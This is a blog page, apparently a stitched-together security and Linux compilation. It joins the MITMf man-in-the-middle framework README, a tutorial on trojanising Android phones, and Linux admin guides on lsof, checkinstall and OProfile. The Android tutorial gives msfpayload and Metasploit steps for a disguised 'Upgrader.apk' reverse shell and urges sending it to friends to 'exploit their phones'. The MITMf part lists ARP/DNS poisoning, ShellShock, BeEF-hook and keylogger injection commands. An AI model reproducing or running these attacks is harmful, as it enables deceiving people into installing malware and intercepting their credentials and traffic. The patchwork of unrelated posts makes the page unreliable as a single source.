Never Ending Security


MITMf – Framework for Man-In-The-Middle attacks



Quick tutorials, examples and developer updates at:

This tool is based on sergio-proxy and is an attempt to revive and update the project.

Contact me at:

Before submitting issues, please read the relevant section in the wiki.


MITMf relies on a LOT of external libraries; therefore, it is highly recommended that you use virtualenvs to install the framework. This avoids permission issues and conflicts with your system site packages (especially on Kali Linux).

Before starting the installation process:

  • On Arch Linux:
pacman -S python2-setuptools libnetfilter_queue libpcap libjpeg-turbo
  • On Debian and derivatives (e.g. Ubuntu, Kali Linux, etc.):
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev

Installing MITMf

Note: if you’re rocking Arch Linux: you’re awesome! Just remember to use pip2 instead of pip outside of the virtualenv

  • Install virtualenvwrapper:
pip install virtualenvwrapper
  • Edit your .bashrc or .zshrc file to source the script:
source /usr/bin/

The location of this script may vary depending on your Linux distro

  • Restart your terminal or run:
source /usr/bin/
  • Create your virtualenv:
mkvirtualenv MITMf -p /usr/bin/python2.7
  • Clone the MITMf repository:
git clone
  • cd into the directory, initialize and clone the repos submodules:
cd MITMf && git submodule init && git submodule update --recursive
  • Install the dependencies:
pip install -r requirements.txt
  • You’re ready to rock!
python --help


MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.

Originally built to address the significant shortcomings of other tools (e.g. Ettercap, Mallory), it has been almost completely rewritten from scratch to provide a modular and easily extensible framework that anyone can use to implement their own MITM attack.


  • The framework contains built-in SMB, HTTP and DNS servers that can be controlled and used by the various plugins; it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
  • As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
  • The configuration file can be edited on-the-fly while MITMf is running; the changes will be passed down through the framework. This allows you to tweak the settings of plugins and servers while performing an attack.
  • MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (over all supported protocols, e.g. HTTP, SMB, LDAP) and Kerberos credentials by using Net-Creds, which is run on startup.
  • Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.
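The on-the-fly configuration reload mentioned above can be sketched in miniature. This is not MITMf's actual reload code; the section and key names below are made up, and the change detection (a content digest) is just one simple way to do it:

```python
import hashlib
import os
import tempfile

def watch_config(path, state):
    """Re-read `path` whenever its contents change (tracked via a digest)."""
    digest = hashlib.sha256(open(path, "rb").read()).hexdigest()
    if digest != state.get("digest"):
        state["digest"] = digest
        state["config"] = open(path).read()
        state["reloads"] = state.get("reloads", 0) + 1
    return state["config"]

# Demo: write a config, poll it twice, edit it, poll again.
with tempfile.NamedTemporaryFile("w", suffix=".conf", delete=False) as f:
    f.write("[SSLstrip+]\ndomains = example.com\n")   # hypothetical section/keys
    path = f.name

state = {}
watch_config(path, state)          # initial load
watch_config(path, state)          # unchanged: no reload happens
with open(path, "w") as f:
    f.write("[SSLstrip+]\ndomains = other.example\n")
print(watch_config(path, state))   # the edit is picked up on the next poll
os.remove(path)
```

A long-running tool would call such a helper periodically from its main loop, letting plugins see updated settings without a restart.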

Active packet filtering/modification

You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)

For example, here’s a stupid little filter that just changes the destination IP address of ICMP packets:

if packet.haslayer(ICMP):
    log('Got an ICMP packet!')
    packet.dst = ''
  • Use the packet variable to access the packet in a Scapy compatible format
  • Use the data variable to access the raw packet data

Now, to use the filter, all we need to do is: python -F ~/

You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else ;)

Note: you can modify filters on-the-fly without restarting MITMf!
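To see the shape of such a filter without a live MITMf run, here is a stand-in sketch. The Packet and ICMP classes below are toys, not Scapy; they only mimic the haslayer() method and dst attribute that the filter body touches, and the addresses are hypothetical:

```python
class ICMP:
    """Toy stand-in for Scapy's ICMP layer class."""

class Packet:
    """Toy stand-in exposing the two members the filter body uses."""
    def __init__(self, layers, dst):
        self._layers = layers
        self.dst = dst

    def haslayer(self, layer):
        return layer in self._layers

packet = Packet(layers=[ICMP], dst="10.0.0.5")

# The filter body itself, shaped like a MITMf filter file:
if packet.haslayer(ICMP):
    print('Got an ICMP packet!')
    packet.dst = '10.0.0.99'   # hypothetical redirect target

print(packet.dst)
```

Inside MITMf the framework hands your filter a real Scapy packet, so the same two lines rewrite live traffic.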


The most basic usage starts the HTTP proxy, the SMB, DNS and HTTP servers, and Net-Creds on interface enp3s0:

python -i enp3s0

ARP poison the whole subnet with the gateway at using the Spoof plugin:

python -i enp3s0 --spoof --arp --gateway

Same as above + a WPAD rogue proxy server using the Responder plugin:

python -i enp3s0 --spoof --arp --gateway --responder --wpad

ARP poison and with the gateway at

python -i enp3s0 --spoof --arp --target, --gateway

Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):

python -i enp3s0 --spoof --dns --arp --target --gateway

Enable LLMNR/NBTNS/MDNS spoofing:

python -i enp3s0 --responder --wredir --nbtns

Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):

python -i enp3s0 --spoof --dhcp

Same as above with a ShellShock payload that will be executed if any client is vulnerable:

python -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Inject an HTML IFrame using the Inject plugin:

python -i enp3s0 --inject --html-url

Inject a JS script:

python -i enp3s0 --inject --js-url http://beef:3000/hook.js

And much much more!

Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)

For a complete list of available options, just run python --help

Currently available plugins

  • HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
  • SMBTrap : Exploits the ‘SMB Trap’ vulnerability on connected clients
  • ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a client's browser
  • Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
  • SSLstrip+ : Partially bypass HSTS
  • Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
  • BeEFAutorun : Autoruns BeEF modules based on a client’s OS or browser type
  • AppCachePoison : Performs HTML5 App-Cache poisoning attacks
  • Ferret-NG : Transparently hijacks client sessions
  • BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
  • FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
  • Inject : Inject arbitrary content into HTML content
  • BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
  • JSkeylogger : Injects a Javascript keylogger into a client’s webpages
  • Replace : Replace arbitrary content in HTML content
  • SMBAuth : Evoke SMB challenge-response authentication attempts
  • Upsidedownternet : Flips images 180 degrees

More information can be found on:

How To Remotely Hack Android using Kali Linux

This is a tutorial explaining how to hack Android phones with Kali.
I couldn't find any tutorials explaining this hack/exploit, so I made one.
(Still, you may already know about this.)

Step 1: Fire-Up Kali:

  • Open a terminal, and make a Trojan .apk
  • You can do this by typing :
  • msfpayload android/meterpreter/reverse_tcp LHOST= R > /root/Upgrader.apk (replace LHOST with your own IP)
  • You can also hack Android over WAN, i.e. through the Internet, by using your public/external IP as the LHOST and by port forwarding (ask me about port forwarding in the comment section if you have problems)

Step 2: Open Another Terminal:

  • Open another terminal while the file is being produced.
  • Load metasploit console, by typing : msfconsole

Step 3: Set-Up a Listener:

  • After it loads (it will take time), load the multi-handler exploit by typing: use exploit/multi/handler
  • Set up a (reverse) payload by typing: set payload android/meterpreter/reverse_tcp
  • To set LHOST, type: set LHOST (Even when hacking over WAN, use your private/internal IP here, not the public/external one)

Step 4: Exploit!

  • At last type: exploit to start the listener.
  • Copy the application that you made (Upgrader.apk) from the root folder to your Android phone.
  • Then share it by uploading it to Dropbox or any file-sharing website.
  • Then send the link that the website gave you to your friends and exploit their phones (only on LAN; but if you used the WAN method, then you can use the exploit anywhere on the Internet)
  • Let the victim install the Upgrader app (as he would think it is meant to upgrade some features on his phone)
  • Note, however, that installation of apps from Unknown Sources must be enabled in the security settings of the Android phone to allow the Trojan to install.
  • And when he clicks Open…

Step 5: BOOM!

There comes the meterpreter prompt:

See Meterpreter commands here:

Mac Linux USB Loader


Tool allowing you to put a Linux distribution on a USB drive and make it bootable on Intel Macs using EFI.

Mac Linux USB Loader logo

General Information

This is the Mac Linux USB Loader, a tool allowing you to take an ISO of a Linux distribution and make it boot using EFI. It requires a single USB drive formatted as FAT; at least 2 GB of free space is recommended. Mac Linux USB Loader is available under the 3-clause BSD license.

The tool is necessary to boot certain Linux distributions that lack EFI booting support. Many distributions have been adding such support since the release of Windows 8, but it has not been finalized and is still nonstandard in most distributions. Many common distributions are supported, like Ubuntu and Linux Mint.

If you wish to contribute to the code or fork the repository, please do so. All development currently takes place on the master branch, and this is where code should be submitted for pull requests. The legacy branch contains the code for pre-3.0 versions of Mac Linux USB Loader; it will not be maintained and is present for historical interest only.

I created this tool, if you care, for several reasons:

  • None of the other tools available (esp. unetbootin) feel native and operate as you would expect on the Mac platform.
  • None of the other methods of which I am aware have the ability to make the archives boot on Intel Macs.
  • It was personally a pain in the neck getting Linux distributions to boot via USB on Macs.

That being said, it does have a few shortcomings:

  • Linux fails to have graphics on some Macs (i.e Macbook Pros with nVidia graphics), which in some cases prevents boot, but this is not necessarily an issue with Mac Linux USB Loader as much as it is an issue with the video drivers that ship with most distributions. Luckily, with Enterprise, which has been included with Mac Linux USB Loader since 2.0, you can use persistence to install the necessary video drivers on distributions like Ubuntu, helping to alleviate the issue.

Building from Source

Requirements: Xcode 6 and the OS X 10.10 SDK. OS X 10.8+ is required to run the built app.

  1. Clone from git: git clone
  2. Run pod install (requires Cocoapods).
  3. Open Mac Linux USB Loader.xcworkspace and do an archive build, or simply run and debug it with Xcode.


  • Used some icons from KDE’s Oxygen. link
  • Special thanks to Leander Lismond for translating the application into Dutch!

More information can be found on:

Linux super-duper admin tools: lsof

lsof is one of the more important tools you can use on your Linux box. Its name is somewhat misleading. lsof stands for list open files, but the term files fails to convey its true power. That is, unless you remember the fundamental lesson: in Linux, everything is a file.

We have had several super-duper admin articles, focusing on tools that help us better understand the behavior of our system, identify performance bottlenecks, and solve issues that have no apparent, immediate presence in the logs. Save for vague, indirect symptoms, you might be struggling to understand what is happening under the hood.


lsof, alongside strace and OProfile, is another extremely versatile, powerful weapon in the arsenal of a system administrator and the curious engineer. Used correctly, it can yield a wealth of information about your machine, helping you narrow down the problem and maybe even expose the culprit.

So let’s see what this cool tool can do.

Why is lsof so important?

I did say lsof is important, but I did not say why. Well, the thing is, with lsof you can do pretty much anything. It encompasses the functionality of numerous other tools that you may be familiar with.

For example, lsof can provide the same information netstat offers. You can use lsof to find mounts on your machine, so it supplements both /etc/mtab and /proc/mounts. You can use lsof to learn what open files a process holds. In general, pretty much anything you can find under the /proc filesystem, lsof can display in a very simple, centralized manner, without writing custom scripts for looping through the sub-directories and parsing and filtering content.
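For a feel of the /proc legwork that lsof saves you, here is a minimal, Linux-only sketch that lists a process's open files by hand:

```python
import os
import tempfile

def open_files(pid="self"):
    """Return (fd, target) pairs by reading /proc/<pid>/fd -- the manual
    version of `lsof -p <pid>` (Linux only, no names, no kernel threads)."""
    fd_dir = "/proc/%s/fd" % pid
    entries = []
    for fd in os.listdir(fd_dir):
        try:
            entries.append((int(fd), os.readlink(os.path.join(fd_dir, fd))))
        except OSError:
            pass  # the descriptor closed while we were iterating
    return entries

tmp = tempfile.NamedTemporaryFile()   # hold a file open so it shows up
listing = open_files()
for fd, target in sorted(listing):
    print(fd, "->", target)
```

lsof does this (and far more: sockets, mmaps, cwd, device resolution) for every process on the box in one command.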

lsof allows you to display information for particular users or processes, show only traffic for certain network protocols, file handles, and more. Used effectively, it's the Swiss Army knife of admin utilities.

lsof in action

A few demonstrations are in order.

Run without any parameters, lsof will display all of the information for all of the files. At this point, I should reiterate that there are many types of files. While most users treat their music and Office documents as files, the generic description goes beyond that: devices, sockets, pipes, and directories are also files.

lsof output explained

Before we dig in, let’s take a look at a basic output:

Basic usage

Command is the name of the process. It also includes kernel threads. PID is the process ID. USER is the owner of the process. FD is the first truly interesting field.

FD stands for File Descriptor, an abstract indicator for accessing files. File descriptors are indexes in kernel data structures called file descriptor tables, which contain details of all open files. Each process has its own file descriptor table. User applications that wish to read from and write to files do so through file descriptors, using system calls. The exact type of the file descriptor determines what the read and write operations really mean.

In our example, we have several different values of FD listed. If you have ever looked under the /proc filesystem and examined the structure of a process, some of the entries will be familiar. For instance, cwd stands for the Current Working Directory of the listed process. txt is the Text Segment or Code Segment (CS), the bit of the object containing executable instructions, or program code if you will. mem stands for Data Segments and Shared Objects loaded into memory. 10u refers to file descriptor 10, open for both reading and writing. rtd stands for root directory.
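The r/w/u suffix on a descriptor can be recovered by hand from /proc/self/fdinfo, where the kernel records each descriptor's open(2) flags. A Linux-only sketch, mapping the access mode to lsof's letters:

```python
import os
import tempfile

def fd_mode(fd):
    """Map a descriptor's access mode to lsof's r/w/u letters via fdinfo."""
    with open("/proc/self/fdinfo/%d" % fd) as f:
        for line in f:
            if line.startswith("flags:"):
                flags = int(line.split()[1], 8)   # octal open(2) flags
                return {os.O_RDONLY: "r",
                        os.O_WRONLY: "w",
                        os.O_RDWR: "u"}[flags & os.O_ACCMODE]

tmp = tempfile.NamedTemporaryFile()        # opened read/write -> "u"
ro = os.open(tmp.name, os.O_RDONLY)        # same file, read-only -> "r"

ro_mode = fd_mode(ro)
rw_mode = fd_mode(tmp.fileno())
print(ro_mode, rw_mode)   # r u
os.close(ro)
```

So when lsof prints 10u, it is reporting exactly this access-mode information for descriptor 10.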

As you can see, you need to understand the output, but once you get the hang of it, it’s a blast. lsof provides a wealth of information, formatted for good looks, without too much effort. Now, it’s up to you to put the information to good use.

The fifth column, TYPE, is directly linked to the FD column. It tells us what type of file we're working with. DIR stands for directory. REG is a regular file or a page in memory. FIFO is a named pipe. Symbolic links, sockets and device files (block and character) are also file types. unknown means that the FD descriptor is of unknown type and locked; you will encounter these only with kernel threads.

For more details, please read the super-extensive man page.

Now, we’re already having a much better picture of what lsof tells us. For instance, 10u is a pipe used by initctl, a process control initialization utility that facilitates the startup of services during bootup. All in all, it may not mean anything at the moment, but if and when you have a problem, the information will prove useful.

The DEVICE column tells us what device we're working on. The two numbers are called the major and minor numbers. The list is well known and documented. For instance, major number 8 stands for a SCSI block device. For comparison, IDE disks have major number 3. The minor number indicates one of the 15 available partitions. Thus (8,1) tells us we're working on sda1.

The other interesting device listed, (0,16), refers to unnamed, non-device mounts.

For detailed list, please see:

SIZE/OFF is the file size or offset. NODE is the inode number. NAME is the name of the file. Again, do not be confused: everything is a file, even your computer monitor; it only has a slightly different representation in the kernel.
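Most of these columns come straight from stat(2), so you can reconstruct them yourself. A small sketch; the (1,3) device numbers for /dev/null assume Linux:

```python
import os
import tempfile

with tempfile.NamedTemporaryFile(delete=False) as f:
    f.write(b"hello lsof")
    path = f.name

st = os.stat(path)
print("DEVICE :", os.major(st.st_dev), os.minor(st.st_dev))  # backing filesystem
print("SIZE   :", st.st_size)                                # SIZE/OFF column
print("NODE   :", st.st_ino)                                 # inode number
print("NAME   :", path)

# Character devices carry their numbers in st_rdev; /dev/null is (1,3) on Linux.
null = os.stat("/dev/null")
print("null   :", os.major(null.st_rdev), os.minor(null.st_rdev))
os.remove(path)
```

lsof simply stats each open file and prints these fields side by side with the process information.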

Now, we know everything. OK, unfiltered output is too much to digest in one go. So let’s start using some flags for smart filtering of information.

Per process

To see all the open files a certain process holds, use -p:

lsof -p <pid>

lsof -p

Per user

Similarly, you can see files per user using the -u flag:

lsof -u <name>

lsof -u

File descriptors

You can see all the processes holding a certain file descriptor with -d <number>:

lsof -d <number>

lsof -d 3

This is very important if you have hung NFS mounts or blocked processes in uninterruptible sleep (D state) refusing to go away. Your only way to start solving the problem is to dig into lsof and trace down the dependencies, hopefully finding processes and files that can be killed and closed. Alternatively, you can also display all the open file descriptors:

Rising number

Notice that the numbers rise in sequence. In general, the Linux kernel will give the first available file descriptor to a process asking for one. Convention calls for file descriptors 0, 1 and 2 to be standard input (STDIN), standard output (STDOUT) and standard error (STDERR), so file descriptor allocation will normally start from 3.

If you’ve ever wondered what we were doing when we devnull-ed both the standard output and the standard error in the strace examples, this ought to explain it. We had the following:

something > /dev/null 2>&1

In other words, we redirected standard output to /dev/null, and then we redirected file descriptor 2 to 1, which means standard error goes to standard output, which itself is redirected to the system black hole.
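The same plumbing can be reproduced with raw descriptor calls. In this sketch we redirect into a temporary file rather than /dev/null, so the result stays visible:

```python
import os
import tempfile

# The shell line `something > /dev/null 2>&1` is raw fd plumbing; here we
# redirect into a temp file instead of /dev/null so we can inspect the result.
target = tempfile.NamedTemporaryFile(delete=False)
saved_out, saved_err = os.dup(1), os.dup(2)

os.dup2(target.fileno(), 1)   # like `> file` : fd 1 now points at the file
os.dup2(1, 2)                 # like `2>&1`   : fd 2 now points where fd 1 does

os.write(1, b"stdout line\n")
os.write(2, b"stderr line\n")

os.dup2(saved_out, 1)         # restore the original descriptors
os.dup2(saved_err, 2)
os.close(saved_out)
os.close(saved_err)

with open(target.name) as f:
    captured = f.read()
os.remove(target.name)
print(captured)
```

Both writes land in the same file, which is exactly what the shell's 2>&1 arranges behind the scenes.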

Finding file descriptors can be quite useful, especially if some applications are hard-coding their use, which can lead to problems and conflicts. But that’s a different story altogether.

One more thing notable from the above screenshot are the unix and CHR FD types, which we have not yet seen. unix stands for a UNIX domain socket, an interprocess communication socket, similar to Internet sockets, only without using a network protocol. CHR stands for a character device. Character devices transmit data one character at a time; typical examples are terminals, keyboards, mice, and similar peripherals, where the order of data is critical.

Do not confuse domain sockets with classic network sockets, which are end-points consisting of an IP address and a port.
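The difference is easy to see in code: a UNIX domain socket pair speaks the familiar socket API with no IP address or port anywhere in sight. A stdlib sketch:

```python
import socket

# Two connected UNIX domain sockets: interprocess plumbing, no IP, no port.
parent, child = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)

parent.sendall(b"ping")
request = child.recv(4)
child.sendall(b"pong")
reply = parent.recv(4)

print(request, reply)
parent.close()
child.close()
```

In lsof output each end of such a pair shows up with TYPE unix, with no address:port in the NAME column.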

Netstat-like behavior

lsof can also provide lots of information similar or identical to netstat's. You can dump the listing of all files and then grep for relevant information, like LISTEN, ESTABLISHED, IPv4, or any other network-related term.


Internet protocols & ports

Specifically, lsof can also show you the open ports for either the IPv4 or IPv6 protocol, much like an nmap scan against localhost:

lsof -i<protocol>

lsof -i

Directory search

lsof also supports a number of flags that are enabled with + and disabled with - signs, rather than the typical single or double dash (-) option prefixes.

One of these is +d (and +D), which lets you show all the processes holding a certain directory. The lowercase +d lists open files in the top level of the directory only, whereas the capital +D recurses into the directory and all of its sub-directories.

lsof +d <dir name> or lsof +D <dirname>

Dir search

Practical example

I've given you two juicy examples when I wrote the strace tutorial. I skimped a bit with OProfile, because simple and relevant problems that can be quickly demonstrated with a profiler are not easy to come by; but do not despair, there shall be an article.

Now, lsof allows plenty of demo space. So here's one.

How do you handle a stuck mount?

Let’s say you have a mount that refuses to go down. And you don’t really know what’s wrong. For some reason, it won’t let you unmount it.



You tried the umount command, but it does not really work:


Luckily for you, openSUSE recommends using lsof, but let’s ignore that for a moment.

Anyhow, your mount won't come down. In desperation and against better judgment, you also try forcing the unmount with the -f flag, but it still does not help. Not only is the mount refusing to let go, you may also have corrupted the /etc/mtab file by issuing the force mount command. Just some food for thought.

Now, how do you handle this?

The hard way

If you’re experienced and know your way about /proc, then you can do the following:

Under /proc, examine the current working directories and file descriptors holding the mount point. Then, examine the process table and see what the offending processes are and if they can be killed.

ls -l /proc/*/cwd | grep just



ls -l /proc/*/fd | grep just


Finally, in our example:

ps -ef | grep -E '10878|10910'


And problem solved …
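The two ls commands above can be automated. A Linux-only sketch that walks /proc looking for processes whose current working directory or open descriptors resolve under a given path (standing in for the stuck mount point):

```python
import glob
import os
import tempfile

def holders(path):
    """PIDs whose cwd or an open fd resolves under `path` (manual /proc walk)."""
    pids = set()
    for link in glob.glob("/proc/[0-9]*/cwd") + glob.glob("/proc/[0-9]*/fd/*"):
        try:
            if os.readlink(link).startswith(path):
                pids.add(int(link.split("/")[2]))
        except OSError:
            continue  # process exited, fd closed, or permission denied
    return pids

# Demo: hold a file open inside a directory, then find ourselves holding it.
mount_point = tempfile.mkdtemp()
busy = open(os.path.join(mount_point, "busy"), "w")
pids = holders(mount_point)
print(pids)
```

Run as root against a real mount point, such a walk surfaces the same PIDs the grep-over-/proc commands did.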

Note: sometimes, especially if you have problems with mounts or stuck processes, lsof may not be the best tool, as it too may get stuck trying to recurse. In these delicate cases, you may want to use the -n and -l flags. -n inhibits the conversion of network IP addresses to domain names, making lsof work faster and avoiding lockups due to name lookups not working properly. -l inhibits the conversion of user IDs to names, which is quite useful if name lookup is working slowly or improperly, including problems with the nscd daemon, connectivity to NIS or LDAP, and other issues. However, sometimes, in extreme cases, going for /proc may be the most sensible option.

The easy (and proper) way

By the book, using lsof ought to do it:

lsof | grep just

lsof just

And problem solved. Well, we still need to free the mount by closing or killing the process and the files held under the mount point, but we know what to do. Not only do we get all the information we need, we get it quickly and efficiently.

Knowing the alternative methods is great, but you should always start smart and simple, with lsof, exploring, narrowing down possibilities and converging on the root cause.

I hope you liked it.


There you go: a wealth of information about lsof and what it can do for you. I bet you won't easily find a detailed explanation of lsof output elsewhere, although examples of actual usage are plentiful. Well, my tutorial provides you with both.

Now, the big stuff is ahead of you: using lsof to troubleshoot serious system problems, without wasting time going through /proc trying to find relevant system information, when it's all there, hidden under just one mighty command.

checkinstall – Smartly manage your installations

The best way to install applications in Linux is by using the package managers. It’s the simplest, safest and most foolproof way of obtaining and maintaining the programs you need. You install them using a friendly and intuitive interface and you uninstall them using the same interface. The dependencies are automatically solved. The program revision is tracked. Whenever you can, use the package manager to get what you need.

There are many package managers available, and they come in two forms: the core utility, which is command-line, and the front-end (GUI), which calls on the command-line tool to do the job. In openSUSE, you have the YaST/zypper combo; in Ubuntu, Synaptic/apt; in Fedora, Pirut/yum; and so forth.


But sometimes, the program you want will not be found in the repositories, even the extra ones like Medibuntu or RPMForge. You will have to download the sources, compile them, and install the package manually.

The problem with this approach is that your manually installed programs will not be visible in your package manager. They won’t show up, nor be available for upgrades or removal, creating a potential clutter/security issue for you, especially if there are many such programs you must use.

Luckily for you, there’s a solution: a utility that can package the sources into installer files that your package manager will recognize and be able to catalog. This utility is called checkinstall.

Enter checkinstall

checkinstall works by functioning as a wrapper for your typical installation from sources. It hooks into the third stage of the configure, make, make install chain and keeps track of every change made to the system. Once the installation is done, it creates a package compatible with your package manager. checkinstall works with RPM, Debian and Slackware packages, covering a rather large install base.
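In spirit, the bookkeeping looks like the sketch below: snapshot the tree, run the install step, and diff. This is a heavy simplification (checkinstall actually intercepts the install as it happens, system-wide), and the guake paths are just example payloads:

```python
import os
import pathlib
import tempfile

def snapshot(root):
    """Record every file path under `root` -- a toy stand-in for tracking
    what `make install` drops onto the system."""
    return {str(p) for p in pathlib.Path(root).rglob("*") if p.is_file()}

root = tempfile.mkdtemp()
before = snapshot(root)

# "make install" stand-in: drop a binary and a man page into the tree.
os.makedirs(os.path.join(root, "usr/local/bin"), exist_ok=True)
pathlib.Path(root, "usr/local/bin/guake").write_text("#!/bin/sh\n")
os.makedirs(os.path.join(root, "usr/local/share/man/man1"), exist_ok=True)
pathlib.Path(root, "usr/local/share/man/man1/guake.1").write_text("man page\n")

installed = sorted(snapshot(root) - before)
for path in installed:
    print(path)   # this file list is what feeds the package manifest
```

That before/after diff is what lets the resulting .deb or .rpm uninstall cleanly later: the package manager knows exactly which files belong to it.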

OK, let’s see this thing in action!

Install checkinstall

The first thing is: install checkinstall. A sort of chicken-and-egg problem. You should probably use your package manager to get checkinstall installed.


Install program from source

Your next step is to find the application you want to install, one which is not found in the repositories. This is not an easy task nowadays. I spent quite a bit of time hunting for a program that I wanted. Eventually, I settled for Guake, a Quake-like drop-down terminal utility. Please note that it DOES exist in the repositories, but it was as good a choice as any.

So I started the usual chain, with configure and make …



Please note that these two steps may fail, depending on the configuration of your system. Some of your libraries may be missing, outdated, or too new for the sources you're trying to compile. Then again, the sources themselves might be badly written, with errors and whatnot.

But assuming that everything went smoothly, your next step is to invoke checkinstall as root (or sudo):


Run checkinstall

A short wizard will guide you through the installation & package creation process. If the package documentation directory does not exist, it will ask you to create one.

You will then have the opportunity to write your own documentation:


Then comes the installation and the creation of the package. You can change the options if you like. Normally, I would not recommend changing any of the values unless you really know what you’re doing.

Debian package

And soon, you will have the program installed:


You can even check in your package manager now, to see whether the package is listed and installed as expected. Yup, there it is! Notice our very own documentation!

In package manager

And the application in the menu:


From now on, the manually installed program is just like any other program. Your package manager will maintain it, sparing you the grueling manual work. Excellent!


checkinstall is a great addition to the Linux user's arsenal of handy tools, especially for experienced users with a taste for non-conventional installations of programs not readily available in the repositories. It allows you to easily keep track of all your applications, whether they come as package installers or from sources.

Linux super-duper admin tools: OProfile

It’s time to step up the geeky fun a notch and learn about OProfile.


OProfile is a Linux system-wide profiling tool that you can use to, uh, profile and analyze performance and runtime problems with your applications, or even the kernel itself. It’s very simple to use and does not require any special preparations. No need to patch the kernel or use debug symbols. Just insert the module and start running.

OProfile uses the hardware performance counters of the CPU to enable profiling of a wide variety of statistics, which you can then use for profiling of the kernel and your applications. In fact, OProfile works with everything, including hardware and software interrupt handlers, kernel modules, the kernel, shared libraries, and applications.

After you've collected the data you need, you can run reports against it, and even produce graphs showing you a visualization of the profiled runs.

For more details, please read the Novell Cool Solutions OProfile article and visit the official website, where you can find lots of useful information about the tool, including its numerous features and advantages.

Now, let’s use it.


I must warn you though. Officially, OProfile is alpha software. Although it has been tested to work well with a wide range of architecture platforms and kernels, there’s no guarantee it will do what’s expected of it. You may even break your system.

My experience shows no issues with OProfile, but you may not be so lucky. Now, if you’re brave enough, proceed.

Regardless, using OProfile is a very geeky thing that will surely impress everyone and may even provide you with yet another powerful tool for making your environment smarter, faster and safer. Home users will probably never need it, but they just might be piqued enough to give it a try, especially if they’re facing severe performance problems. System admin wise, OProfile probably falls into the Level II-III support, so you won’t be using it that often, but when you do, it should come quite handy.

Install OProfile

The tool comes available in the repositories of many distributions, so you will not have to manually download and compile. If you do, consider using checkinstall to have it registered in your software database.


Running OProfile

Now, we need to start using the tool.

The first question you need to ask yourself is: do you also want to profile the kernel? Your answer will determine the OProfile command line.

If you wish to run OProfile without profiling the kernel, then:

opcontrol --no-vmlinux

If you do want to profile the kernel, as well, then:

opcontrol --vmlinux=/boot/vmlinux-`uname -r`


The above command will set the Linux kernel to the running version of your kernel in uncompressed form. To make sure such a kernel exists, please take a look under your /boot directory.

Modern Linux distributions ship with the kernel archived (zipped) to conserve space, so you will have to unzip it before it can be used:

Boot dir

So we do have the kernel available, it’s vmlinux-<whatever>.gz. We need to unzip it. This is done with the gunzip command:

gunzip vmlinux-<something>.gz
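For the curious, here is the decompression step in miniature using Python's gzip module on a dummy file; the real input would be the /boot/vmlinux-<version>.gz image:

```python
import gzip
import os
import tempfile

# gunzip in miniature: decompress foo.gz to foo, stripping the suffix.
d = tempfile.mkdtemp()
gz_path = os.path.join(d, "vmlinux-demo.gz")
with gzip.open(gz_path, "wb") as f:
    f.write(b"not a real kernel image")   # dummy payload, not a kernel

out_path = gz_path[:-3]                   # drop ".gz", as gunzip does
with gzip.open(gz_path, "rb") as src, open(out_path, "wb") as dst:
    dst.write(src.read())

print(open(out_path, "rb").read())
```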

Like this:


Now, if needed, rerun the opcontrol command from before to set the kernel. Once you’ve done this, launch the tool. It will start collecting the data.


Let it run for a while before stopping it and profiling the data. In fact, to make things meaningful, we'll run a little compilation in the background, so that our report contains more data, as well as more meaningful data. A good example is MPlayer.


After a while you can simply dump the collected data and continue profiling or stop the profiler altogether. To just dump the data, use:

opcontrol --dump

To stop it, use:

opcontrol --stop


If, at any given moment, you wish to reset your profiling counters and start fresh, you can reset the OProfile daemon:

opcontrol --reset

And to shut it down altogether:

opcontrol --shutdown


Once you've collected enough data, it's time for a report. Just run:


To get what you need. This is where the real fun begins, analyzing the report and trying to understand the problems you’re facing.

Anyhow, here’s a sample of what it may look like. Screenshot taken on another host, so please don’t mind the differences in host names and CPU speeds and such.


More data

In the leftmost column, you will get the exact number of samples collected. In the middle one, the percentage of time spent using different libraries. In the rightmost column, the actual process name. Usually, you will see a whole bunch of glibc, perl and other libraries. If you’re compiling a tool that also uses GUI, then other interesting bits, too.

Since I was also listening to Youtube in Firefox while compiling and doing a few more things, you will notice calls to Nvidia driver, Flash player and so forth.

Now, opreport may not report everything you want, and it may even exit with an error. Sometimes, the amount of time spent profiling may not be enough to produce a meaningful report. At other times, you may need packages with debug symbols or even a complete debug kernel.

In that case, you will want to run opreport --symbols or opreport -l to get more data.


And you may even want to create a call graph. This is done by running opreport -c, after enabling call-graph collection with opcontrol --callgraph.

Call graph

You will need a tool that can read and display call graphs. There are many, many options available. For example, an oldie but goodie Kpl comes to mind:


You may also want to use KCachegrind, but this one requires the call graphs to be in the Valgrind format, which will require a conversion tool. This is where the real hacking kicks in, but this is beyond the scope of this article. We’ll talk about advanced system debugging in following articles. Consider strace and OProfile a sort of a long and expensive warmup.


OProfile is a very handy, useful tool. In the hands of a smart system administrator, it can be used to detect application slowness problems, analyze system bottlenecks, optimize system performance and utilization, and resolve resource/usage conflicts. Combined with a range of other admin programs, some of which we’ve talked about and others we are yet to see, OProfile is a must-have item on the system debugging checklist.

I hope you’ve enjoyed this article. Many more are yet to come, exposing you to the realm of uber-hack. As to profiling itself, we’ll talk about some other cool programs, including Valgrind and Linux Trace Toolkit (LTT).

Linux super-duper admin tools: screen

